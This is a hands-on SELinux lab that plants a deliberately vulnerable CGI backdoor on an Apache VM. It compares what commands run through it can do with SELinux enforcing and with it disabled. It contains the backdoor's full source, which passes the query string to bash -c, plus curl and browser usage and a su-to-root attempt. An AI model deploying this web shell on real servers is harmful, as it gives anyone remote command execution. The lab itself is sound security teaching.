#########################################################
# Seeing the effect of SELinux after an http compromise #
#########################################################
####
#### Objective: Use a cgi backdoor to access a system with and without SELinux enabled
####
#### Basic steps:
#### - Install httpd
#### - Start and enable service
#### - Add port to firewall
#### - Install cgi backdoor
#### - Connect to backdoor and try some things
#### - Try same things in apache user full shell
#### - Disable SELinux, reboot
#### - Connect to backdoor again and try same things
#### - Optionally, clone VM and compare side-by-side
#### 
#### Full solution:

#### Install packages for apache (httpd)
[root@localhost ~]# yum group install "basic web server"

#### start/enable httpd service, and open the firewall for the port the backdoor will be reached on.
#### NOTE: the rule below opens tcp/8001, but the ss output further down shows httpd listening on
#### 80 and 443 only. Unless you have changed Listen in httpd.conf, open 80 instead
#### (firewall-cmd --permanent --add-service=http), or the CGI will not be reachable from outside the VM.
[root@localhost ~]# systemctl enable httpd
ln -s '/usr/lib/systemd/system/httpd.service' '/etc/systemd/system/multi-user.target.wants/httpd.service'
[root@localhost ~]# systemctl start httpd
[root@localhost ~]# firewall-cmd --list-all
public (default, active)
  interfaces: enp0s3
  sources:
  services: dhcpv6-client ssh
  ports:
  masquerade: no
  forward-ports:
  icmp-blocks:
  rich rules:

[root@localhost ~]# firewall-cmd --permanent --add-port=8001/tcp
success
[root@localhost ~]# firewall-cmd --reload
success
[root@localhost ~]# firewall-cmd --list-all
public (default, active)
  interfaces: enp0s3
  sources:
  services: dhcpv6-client ssh
  ports: 8001/tcp
  masquerade: no
  forward-ports:
  icmp-blocks:
  rich rules:

#### httpd is now listening on 80 and 443
[root@localhost ~]# ss -lntp | grep httpd
LISTEN     0      128                      :::80                      :::*      users:(("httpd",9724,4),("httpd",9723,4),("httpd",9722,4),("httpd",9721,4),("httpd",9720,4),("httpd",9719,4),("httpd",9718,4))
LISTEN     0      128                      :::443                     :::*      users:(("httpd",9724,6),("httpd",9723,6),("httpd",9722,6),("httpd",9721,6),("httpd",9720,6),("httpd",9719,6),("httpd",9718,6))

#### Put the cgi backdoor into place at /var/www/cgi-bin/index.cgi
#### WARNING: this is a deliberately vulnerable artefact - it runs whatever is in the query string
#### as the apache user. Only deploy it on an isolated lab VM, and delete it when the exercise is over.
#### You can scp it, or paste into an ssh window
#### Here is what should go in the file (between the marker lines)
--- BEGIN ---
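#!/bin/sh
# Deliberately vulnerable CGI "backdoor" for the SELinux lab.
# It URL-decodes QUERY_STRING (expected form: cmd=<shell command>), strips the
# leading "cmd=", and hands the remainder to bash -c, so anyone who can reach
# /cgi-bin/index.cgi runs arbitrary commands as the httpd user.
# Isolated lab VM only; remove it when the exercise is done.

# The body is raw command output, not markup, so label it as plain text
# (text/html would collapse whitespace and render any '<' in the output as tags).
printf 'Content-type: text/plain\n\n'

# Decode %XX escapes. urllib.unquote (py2) / urllib.parse.unquote (py3) are
# equivalent here; neither turns '+' into a space. Fall back to python3 on
# hosts that no longer ship python2.
if command -v python2 >/dev/null 2>&1; then
  CMD=$(python2 -c 'import sys, urllib; print urllib.unquote(sys.argv[1])' "${QUERY_STRING}")
else
  CMD=$(python3 -c 'import sys, urllib.parse; print(urllib.parse.unquote(sys.argv[1]))' "${QUERY_STRING}")
fi
CMD=$(printf '%s\n' "${CMD}" | sed 's:^cmd=::')

# Intentional command injection; stderr is merged so errors show up in the response.
bash -c "${CMD}" 2>&1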
--- END ---

# Make the backdoor executable
chmod +x /var/www/cgi-bin/index.cgi

# Make sure that the SELinux label of the new file is correct: the type must be httpd_sys_script_exec_t
# (as in the listing below). Note the listing still shows mode -rw-r--r--, so it was evidently captured
# before the chmod +x above; httpd will not execute the CGI without the x bit, so re-check both.
[root@localhost ~]# ls -laZ /var/www/cgi-bin/index.cgi 
-rw-r--r--. root root unconfined_u:object_r:httpd_sys_script_exec_t:s0 /var/www/cgi-bin/index.cgi

# Depending on how you put the file in place it may or may not be correct, to fix
restorecon -vvFR /var/www

#### To use the cgi backdoor access through the webserver /cgi-bin/index.cgi?cmd=(CMD)
#### THere are several ways to do this
#### Put this in the browser on your host system (20080 here is presumably a host-side port
#### forwarded to the VM's port 80 - substitute whatever reaches your VM's httpd)
http://localhost:20080/cgi-bin/index.cgi?cmd=ifconfig

#### Use curl
curl http://localhost:20080/cgi-bin/index.cgi -G --data-urlencode "cmd=ifconfig"

#### If you are in an environment that can execute shell scripts (unix system, cygwin, etc)
#### Then you can use the cgiclient.sh script
#### It will provide you wth an interactive shell through the backdoor
treehouse:SELinux ben$ ./cgiclient.sh 
Usage: ./cgiclient.sh ip|hostname [cmd list]
treehouse:SELinux ben$ ./cgiclient.sh localhost:20080
[ localhost:20080 ]$ ifconfig
Warning: cannot open /proc/net/dev (Permission denied). Limited output.
Warning: cannot open /proc/net/dev (Permission denied). Limited output.
Warning: cannot open /proc/net/dev (Permission denied). Limited output.
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
        ether 08:00:27:69:9d:70  txqueuelen 1000  (Ethernet)

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 0  (Local Loopback)

[ localhost:20080 ]$ exit

#### Try some commands to test your privileges on the system.
#### Everything below runs in the httpd_sys_script_t domain (see the `id` output). Each "Permission denied"
#### is an SELinux denial, not a DAC one: /tmp/t is mode 0755 and owned by apache yet cannot be executed,
#### and su fails with "System error" even though the root password used is correct (it works in the
#### unconfined shell later). On the VM, confirm with: ausearch -m AVC -ts recent
treehouse:SELinux ben$ ./cgiclient.sh localhost:20080
[ localhost:20080 ]$ ls -la /
total 36
dr-xr-xr-x.  17 root root 4096 Oct  3 17:31 .
dr-xr-xr-x.  17 root root 4096 Oct  3 17:31 ..
lrwxrwxrwx.   1 root root    7 Oct  3 17:29 bin -> usr/bin
dr-xr-xr-x.   4 root root 4096 Oct  3 17:31 boot
drwxr-xr-x.  19 root root 2960 Oct  4 13:55 dev
drwxr-xr-x.  85 root root 8192 Oct  4 14:11 etc
drwxr-xr-x.   3 root root   17 Oct  3 17:31 home
lrwxrwxrwx.   1 root root    7 Oct  3 17:29 lib -> usr/lib
lrwxrwxrwx.   1 root root    9 Oct  3 17:29 lib64 -> usr/lib64
drwxr-xr-x.   2 root root    6 Jun  9  2014 media
drwxr-xr-x.   2 root root    6 Jun  9  2014 mnt
drwxr-xr-x.   3 root root   15 Oct  4 13:56 opt
dr-xr-xr-x. 107 root root    0 Oct  4 13:55 proc
dr-xr-x---.   4 root root 4096 Oct  4 14:07 root
drwxr-xr-x.  26 root root  720 Oct  4 14:11 run
lrwxrwxrwx.   1 root root    8 Oct  3 17:29 sbin -> usr/sbin
drwxr-xr-x.   2 root root    6 Jun  9  2014 srv
dr-xr-xr-x.  13 root root    0 Oct  4 13:55 sys
drwxrwxrwt.   2 root root    6 Oct  4 14:01 tmp
drwxr-xr-x.  13 root root 4096 Oct  3 17:29 usr
drwxr-xr-x.  22 root root 4096 Oct  4 13:56 var
[ localhost:20080 ]$ getenforce
getenforce:  getenforce() failed[ localhost:20080 ]$ 
[ localhost:20080 ]$ id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_sys_script_t:s0
[ localhost:20080 ]$ ls -la /tmp
total 4
drwxrwxrwt.  2 root root    6 Oct  4 14:01 .
dr-xr-xr-x. 17 root root 4096 Oct  3 17:31 ..
[ localhost:20080 ]$ touch /tmp/t
[ localhost:20080 ]$ ls -la /tmp
total 4
drwxrwxrwt.  2 root   root     14 Oct  4 14:45 .
dr-xr-xr-x. 17 root   root   4096 Oct  3 17:31 ..
-rw-r--r--.  1 apache apache    0 Oct  4 14:45 t
[ localhost:20080 ]$ echo banana | su - -c "id"
Password: su: System error
[ localhost:20080 ]$ echo "#!/bin/sh" >> /tmp/t
[ localhost:20080 ]$ echo "id" >> /tmp/t
[ localhost:20080 ]$ chmod +x /tmp/t
[ localhost:20080 ]$ /tmp/t
bash: /tmp/t: Permission denied
[ localhost:20080 ]$ ls -la /tmp
total 8
drwxrwxrwt.  2 root   root     14 Oct  4 14:45 .
dr-xr-xr-x. 17 root   root   4096 Oct  3 17:31 ..
-rwxr-xr-x.  1 apache apache   13 Oct  4 14:51 t

#### Compare these to what you can do with SELinux enabled in a full apache user shell.
#### Caveat: `su` from an unconfined root shell leaves the process in unconfined_t (see the `id`
#### output below), so this shell shows what DAC alone allows uid 48 to do. The only thing that differs
#### from the backdoor session is the SELinux domain - which is exactly the point of the comparison.
[root@localhost ~]# su - apache -s /bin/bash
-bash-4.2$ id
uid=48(apache) gid=48(apache) groups=48(apache) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
-bash-4.2$ ls -la /
total 40
dr-xr-xr-x.  17 root root 4096 Oct  4 15:02 .
dr-xr-xr-x.  17 root root 4096 Oct  4 15:02 ..
lrwxrwxrwx.   1 root root    7 Oct  3 17:29 bin -> usr/bin
dr-xr-xr-x.   4 root root 4096 Oct  3 17:31 boot
drwxr-xr-x.  19 root root 2960 Oct  4 15:03 dev
drwxr-xr-x.  85 root root 8192 Oct  4 15:03 etc
drwxr-xr-x.   3 root root   17 Oct  3 17:31 home
lrwxrwxrwx.   1 root root    7 Oct  3 17:29 lib -> usr/lib
lrwxrwxrwx.   1 root root    9 Oct  3 17:29 lib64 -> usr/lib64
drwxr-xr-x.   2 root root    6 Jun  9  2014 media
drwxr-xr-x.   2 root root    6 Jun  9  2014 mnt
drwxr-xr-x.   3 root root   15 Oct  4 13:56 opt
dr-xr-xr-x. 115 root root    0 Oct  4 15:03 proc
dr-xr-x---.   4 root root 4096 Oct  4 14:07 root
drwxr-xr-x.  26 root root  760 Oct  4 15:03 run
lrwxrwxrwx.   1 root root    8 Oct  3 17:29 sbin -> usr/sbin
drwxr-xr-x.   2 root root    6 Jun  9  2014 srv
dr-xr-xr-x.  13 root root    0 Oct  4 15:03 sys
drwxrwxrwt.   8 root root 4096 Oct  4 15:03 tmp
drwxr-xr-x.  13 root root 4096 Oct  3 17:29 usr
drwxr-xr-x.  22 root root 4096 Oct  4 15:03 var
-bash-4.2$ getenforce
Enforcing
-bash-4.2$ ls -la /tmp
total 184
drwxrwxrwt.  8 root root  4096 Oct  4 15:03 .
dr-xr-xr-x. 17 root root  4096 Oct  4 15:02 ..
drwxrwxrwt.  2 root root     6 Oct  3 17:29 .font-unix
drwxrwxrwt.  2 root root     6 Oct  3 17:29 .ICE-unix
-rwx------.  1 root root   813 Oct  3 17:32 ks-script-XS5xaX
drwx------.  3 root root    16 Oct  4 15:03 systemd-private-7HgbpM
drwxrwxrwt.  2 root root     6 Oct  3 17:29 .Test-unix
drwxrwxrwt.  2 root root     6 Oct  3 17:29 .X11-unix
drwxrwxrwt.  2 root root     6 Oct  3 17:29 .XIM-unix
-rw-------.  1 root root     0 Oct  3 17:29 yum.log
-rw-------.  1 root root 78432 Oct  3 17:49 yum_save_tx.2015-10-03.17-49.UTOUcX.yumtx
-rw-------.  1 root root  1857 Oct  3 17:50 yum_save_tx.2015-10-03.17-50.CmqQrd.yumtx
-rw-------.  1 root root  7230 Oct  3 17:51 yum_save_tx.2015-10-03.17-51.7G0GoS.yumtx
-rw-------.  1 root root 78432 Oct  4 13:53 yum_save_tx.2015-10-04.13-53.opAj8I.yumtx
-bash-4.2$ touch /tmp/t
-bash-4.2$ ls -la /tmp
total 184
drwxrwxrwt.  8 root   root    4096 Oct  4 15:04 .
dr-xr-xr-x. 17 root   root    4096 Oct  4 15:02 ..
drwxrwxrwt.  2 root   root       6 Oct  3 17:29 .font-unix
drwxrwxrwt.  2 root   root       6 Oct  3 17:29 .ICE-unix
-rwx------.  1 root   root     813 Oct  3 17:32 ks-script-XS5xaX
drwx------.  3 root   root      16 Oct  4 15:03 systemd-private-7HgbpM
-rw-r--r--.  1 apache apache     0 Oct  4 15:04 t
drwxrwxrwt.  2 root   root       6 Oct  3 17:29 .Test-unix
drwxrwxrwt.  2 root   root       6 Oct  3 17:29 .X11-unix
drwxrwxrwt.  2 root   root       6 Oct  3 17:29 .XIM-unix
-rw-------.  1 root   root       0 Oct  3 17:29 yum.log
-rw-------.  1 root   root   78432 Oct  3 17:49 yum_save_tx.2015-10-03.17-49.UTOUcX.yumtx
-rw-------.  1 root   root    1857 Oct  3 17:50 yum_save_tx.2015-10-03.17-50.CmqQrd.yumtx
-rw-------.  1 root   root    7230 Oct  3 17:51 yum_save_tx.2015-10-03.17-51.7G0GoS.yumtx
-rw-------.  1 root   root   78432 Oct  4 13:53 yum_save_tx.2015-10-04.13-53.opAj8I.yumtx
-bash-4.2$ echo banana | su - -c "id"
Password: uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
-bash-4.2$ ls -la /home
total 8
drwxr-xr-x.  3 root root   17 Oct  3 17:31 .
dr-xr-xr-x. 17 root root 4096 Oct  4 15:02 ..
drwx------.  4 user user 4096 Oct  4 14:05 user
-bash-4.2$ echo "#!/bin/sh" >> /tmp/t
-bash: !/bin/sh": event not found
-bash-4.2$ vi /tmp/t
-bash-4.2$ chmod +x /tmp/t
-bash-4.2$ /tmp/t
uid=48(apache) gid=48(apache) groups=48(apache) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
-bash-4.2$ ls -laZ /tmp
drwxrwxrwt. root   root   system_u:object_r:tmp_t:s0       .
dr-xr-xr-x. root   root   system_u:object_r:root_t:s0      ..
drwxrwxrwt. root   root   system_u:object_r:user_fonts_t:s0 .font-unix
drwxrwxrwt. root   root   system_u:object_r:user_tmp_t:s0  .ICE-unix
-rwx------. root   root   system_u:object_r:initrc_tmp_t:s0 ks-script-XS5xaX
drwx------. root   root   system_u:object_r:tmp_t:s0       systemd-private-7HgbpM
-rwxr-xr-x. apache apache unconfined_u:object_r:user_tmp_t:s0 t
drwxrwxrwt. root   root   system_u:object_r:rpm_script_tmp_t:s0 .Test-unix
drwxrwxrwt. root   root   system_u:object_r:user_tmp_t:s0  .X11-unix
drwxrwxrwt. root   root   system_u:object_r:rpm_script_tmp_t:s0 .XIM-unix
-rw-------. root   root   system_u:object_r:initrc_tmp_t:s0 yum.log
-rw-------. root   root   unconfined_u:object_r:user_tmp_t:s0 yum_save_tx.2015-10-03.17-49.UTOUcX.yumtx
-rw-------. root   root   unconfined_u:object_r:user_tmp_t:s0 yum_save_tx.2015-10-03.17-50.CmqQrd.yumtx
-rw-------. root   root   unconfined_u:object_r:user_tmp_t:s0 yum_save_tx.2015-10-03.17-51.7G0GoS.yumtx
-rw-------. root   root   unconfined_u:object_r:user_tmp_t:s0 yum_save_tx.2015-10-04.13-53.opAj8I.yumtx


#### Disable SELinux and reboot
#### Edit /etc/selinux/config (not /etc/selinux/conf) and set SELINUX=disabled. Files created while
#### disabled get no label (they show as "?" in the ls -Z output below), so touch /.autorelabel before
#### switching back to enforcing. If you only want to compare behaviour, `setenforce 0` (permissive)
#### needs no reboot and keeps labels intact; getenforce will then report Permissive rather than Disabled.
vi /etc/selinux/config
systemctl reboot

#### Connect to the backdoor again and try the same commands
treehouse:SELinux ben$ ./cgiclient.sh localhost:20080
[ localhost:20080 ]$ ls -la /
total 36
dr-xr-xr-x.  17 root root 4096 Oct  4 14:52 .
dr-xr-xr-x.  17 root root 4096 Oct  4 14:52 ..
-rw-r--r--    1 root root    0 Oct  4 14:52 .autorelabel
lrwxrwxrwx.   1 root root    7 Oct  3 17:29 bin -> usr/bin
dr-xr-xr-x.   4 root root 4096 Oct  3 17:31 boot
drwxr-xr-x   19 root root 2960 Oct  4 14:52 dev
drwxr-xr-x.  85 root root 8192 Oct  4 14:52 etc
drwxr-xr-x.   3 root root   17 Oct  3 17:31 home
lrwxrwxrwx.   1 root root    7 Oct  3 17:29 lib -> usr/lib
lrwxrwxrwx.   1 root root    9 Oct  3 17:29 lib64 -> usr/lib64
drwxr-xr-x.   2 root root    6 Jun  9  2014 media
drwxr-xr-x.   2 root root    6 Jun  9  2014 mnt
drwxr-xr-x.   3 root root   15 Oct  4 13:56 opt
dr-xr-xr-x  111 root root    0 Oct  4 14:52 proc
dr-xr-x---.   4 root root 4096 Oct  4 14:07 root
drwxr-xr-x   26 root root  760 Oct  4 14:52 run
lrwxrwxrwx.   1 root root    8 Oct  3 17:29 sbin -> usr/sbin
drwxr-xr-x.   2 root root    6 Jun  9  2014 srv
dr-xr-xr-x   13 root root    0 Oct  4 14:52 sys
drwxrwxrwt    2 root root    6 Oct  4 14:52 tmp
drwxr-xr-x.  13 root root 4096 Oct  3 17:29 usr
drwxr-xr-x.  22 root root 4096 Oct  4 14:52 var
[ localhost:20080 ]$ getenforce
Disabled
[ localhost:20080 ]$ id
uid=48(apache) gid=48(apache) groups=48(apache)
[ localhost:20080 ]$ ls -la /tmp
total 4
drwxrwxrwt   2 root root    6 Oct  4 14:52 .
dr-xr-xr-x. 17 root root 4096 Oct  4 14:52 ..
[ localhost:20080 ]$ touch /tmp/t
[ localhost:20080 ]$ ls -la /tmp
total 4
drwxrwxrwt   2 root   root     14 Oct  4 14:57 .
dr-xr-xr-x. 17 root   root   4096 Oct  4 14:52 ..
-rw-r--r--   1 apache apache    0 Oct  4 14:57 t
[ localhost:20080 ]$ echo banana | su - -c "id"
Password: uid=0(root) gid=0(root) groups=0(root)
[ localhost:20080 ]$ ls -la /home
total 8
drwxr-xr-x.  3 root root   17 Oct  3 17:31 .
dr-xr-xr-x. 17 root root 4096 Oct  4 14:52 ..
drwx------.  4 user user 4096 Oct  4 14:05 user
[ localhost:20080 ]$ echo "#!/bin/sh" >> /tmp/t
[ localhost:20080 ]$ echo "id" >> /tmp/t
[ localhost:20080 ]$ chmod +x /tmp/t
[ localhost:20080 ]$ /tmp/t
uid=48(apache) gid=48(apache) groups=48(apache)
[ localhost:20080 ]$ ls -la /tmp
total 8
drwxrwxrwt   2 root   root     14 Oct  4 14:57 .
dr-xr-xr-x. 17 root   root   4096 Oct  4 14:52 ..
-rwxr-xr-x   1 apache apache   13 Oct  4 14:58 t
[ localhost:20080 ]$ ls -laZ /tmp
drwxrwxrwt  root   root   ?                                .
dr-xr-xr-x. root   root   system_u:object_r:root_t:s0      ..
-rwxr-xr-x  apache apache ?                                t
[ localhost:20080 ]$ exit










